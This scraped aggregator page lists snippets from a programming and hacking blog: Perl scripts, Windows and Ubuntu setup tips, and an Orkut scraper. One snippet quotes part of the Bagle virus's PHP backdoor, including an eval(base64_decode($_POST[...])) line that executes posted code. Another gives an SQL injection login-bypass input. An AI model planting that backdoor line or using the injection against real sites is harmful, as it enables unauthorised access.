03 Jan, 2011

Error getting mechanize

Articles related to error getting mechanize

PHP Code Analysis of Bagle Virus

http://digitalpbk.blogspot.com/2009/10/bagle-virus-analysis-php-code.html ($a == 'default output handler' ? false : $a); for ($i = count ($s) - 1; $i >= 0; $i--) { $s[$i][1] = ob_get_contents (); ob_end_clean (); } ob_start ('b0sr'); for ($i = 0; $i { ob_start ($s[$i][0]); echo $s[$i][1]; } } }$b0srl = (($a = @set_error_handler ('b0sr2')) != 'b0sr2') ? $a : 0;eval (base64_decode ($_POST['e'])); ...
Published 2 years, 3 months ago

Drag 'n Drop Files from explorer to VB

http://digitalpbk.blogspot.com/2006/12/drag-n-drop-files-from-explorer-to-vb.html Drag 'n Drop Files from explorer to VB IntroductionThis piece of code allows to make programs in Visual Basic 6, to have a drag and drop support of files directly from the folders. This is an alternative to the old File Open mechanism. This is way cooler...Code tested on Windows XP and on Visual Basic 6. Any information about other versions of windows or vb? Leave a comment...DownloadDownload the code from planet source code.The CodeThe main part of the code is the module, here ...
Published 5 years, 1 month ago

SQL Injection: Tutorial Part 1

http://digitalpbk.blogspot.com/2009/06/hacking-sql-injection-tutorial.html injection hole, all an user has to do is add a ' (single quote) to the username and/or password fields, sayuser=digitalpbkpass=password'Now the SQL query would be constructed as SELECT * FROM users WHERE user='digitalpbk' AND pass='password''This will throw up an invalid SQL and if the errors are not supressed you will get a screen as shown below:So if we modify the user input field pass such thatuser=digitalpbkpass=password' OR '1'='1,the constructed SQL ...
Published 2 years, 7 months ago

Orkut Perl Script - Login, Scrapper and more

http://digitalpbk.blogspot.com/2007/06/orkut-mass-scrapper-scrap-all-friends.html Orkut Perl Script - Login, Scrapper and more IntroThis is a PERL script that logs you into Orkut and allows you to scrap yiur friends. Following is the program and beneath it lies the manual to use the program. I assume that you already have PERL installed on your system with the required modules:LWPWWW::MechanizeProgram#! /usr/bin/perl -wuse WWW::Mechanize;use HTTP::Cookies;use HTTP::Request::Common;use subs qw(print_c login logout home grab proces scrap);#autoflush STDOUT 1;printf ...
Published 4 years, 7 months ago

Setting up Apache-PHP on windows.

http://digitalpbk.blogspot.com/2006/12/setting-up-apache-php-on-windows.html who can get stuff from this server.# Order allow,deny Allow from allSo C:\public_html\ is the server root. ie http://localhost/ = C:\public_html.After this is done test the configuration by executing (command line):C:\Apache2\bin>apache -tIf the syntax is right you will get a "Syntax OK" message.Step 4 : Installing phpTo install php, just extract or copy the "PHP" folder to C:\Apache2\ so that C:\Apache2\PHP is created.Step 5 : configuring PHPCopy ...
Published 5 years, 1 month ago

Network Traffic Calculator using VC++ 6 on XP

http://digitalpbk.blogspot.com/2006/11/network-traffic-calculator-using-vc-6.html Res = WSAIoctl(Sock, SIO_GET_INTERFACE_LIST,0, 0,&buffer;, 1024, &lnBytesReturned;,0, 0); if(lnRes) return WSAGetLastError(); for(int i=0u;i76;i++)> { if(i } closesocket(Sock); return 0;}int ConnectSock(char sck[],int port,HWND hwnd){ WORD wVs = MAKEWORD(2,2); WSADATA wsaData; int err=WSAStartup(wVs,&wsaData;); if(err!=0) return INVALID_SOCKET; SOCKADDR_IN sin; sin.sin_family = AF_INET; sin.sin_port = htons(port); if(sin.sin_port == INVALID_SOCKET) return INVALID_SOCKET; unsigned long iret ...
Published 5 years, 2 months ago

Install Wireless Wifi drivers on Sony Vaio CW on Linux Ubuntu

http://digitalpbk.com/ubuntu/install-wireless-wifi-drivers-linux-karmic-9.1-sony-vaio-cw Install Wireless Wifi drivers on Sony Vaio CW on Linux Ubuntu Out of the box Ubuntu 9.10 wireless/wifi did not work on my Sony Vaio CW Series (VPCCW26FG), The following error message is shown on start up and on dmesg command. Could not read microcode: -2 The solution was to install backports modules. Installing Wireless Drivers on Ubuntu In order to make wireless (WiFi) work on the new Sony Vaio CW series, you have to run the following commands on Ubuntu 9.10 Karmic. sudo apt-get clean ...
Published 1 year, 10 months ago

Error Installing PERL modules "unrecognized command line option -fstack -protector"

http://digitalpbk.com/perl/install-modules-unrecognized-command-line-option-fstack-protector Error Installing PERL modules "unrecognized command line option -fstack -protector" Error Installing PERL modules "unrecognized command line option -fstack -protector" unrecognized command line option "-fstack-protector" error usually comes on Cygwin when installing PERL modules. For example when installing the DBI module or DBD::MySQL perl module, the following error comes on cygwin : cp lib/DBI/Gofer/Serializer/Base.pm blib/lib/DBI/Gofer/Serializer/Base.pm cp dbipport.h blib/arch/auto/DBI/dbipport.h cp lib/DBI/Gofer/Execute.pm blib ...
Published 1 year, 10 months ago

Perl Download Manager

http://digitalpbk.blogspot.com/2008/06/perl-download-manager.html ; $enbit = $length - 1 if($enbit > $length); my $err =0; my $i = int($stbit / $pcksize); my $req = HTTP::Request->new('GET',$url); if($stbit >= $length) { print "$localfile Part Complete! $length $stbit\n"; $stats[$inx] = 1; return; } while($stbit { my $stbit2 = $stbit + $blockstart; my $enbit2 = $enbit + $blockstart; my $range = "bytes=$stbit2-$enbit2"; $req->header('Range' => $range); $i++; print "\n $inx ... $i ...
Published 3 years, 7 months ago

Making symbolic links on Windows xp using junction from sysinternals

http://digitalpbk.com/2009/12/making-symbolic-links-windows-xp-using-junction-sysinternals Copyright (C) 2000-2007 Mark Russinovich Systems Internals - http://www.sysinternals.com The first usage is for displaying reparse point information, and the second usage is for creating or deleting a NTFS junction point: usage: junction [-s] [-q] -q Don't print error messages (quiet) -s Recurse subdirectories usage: junction [-d] [] -d Delete the specified junction example: junction d:\link c:\winnt This is most commonly required and useful when you ...
Published 2 years, 1 month ago

Related help topics for error getting mechanize More keywords like error getting mechanize
More pages for error getting mechanize


Email Newsletter
Email:
Popular Posts
Recent Posts
Tags
Random photo
Piercing Light Radha Nagar Beach 1 Havelock Piercing Light Radha Nagar Beach 1 Havelock in Havelock Island Andaman
On Facebook
Recent Comments


digitalpbk